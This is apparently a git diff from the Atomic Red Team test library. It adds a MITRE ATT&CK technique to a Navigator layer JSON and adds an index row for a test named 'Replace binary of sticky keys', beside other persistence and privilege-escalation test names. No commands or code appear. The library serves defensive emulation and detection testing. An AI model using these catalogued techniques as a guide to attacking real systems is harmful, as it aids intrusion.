,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":tr
ue},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index f3fa5f62..dc96ba52 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqu
eID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","sco
re":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","s
core":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":
"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"
enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":
true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":tru
e},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID"
:"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T113
4.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"tech
niqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006",
"score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":1
00,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index b0c89087..dbe30ffd 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -2,6 +2,7 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell +privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt privilege-escalation,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt privilege-escalation,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell 
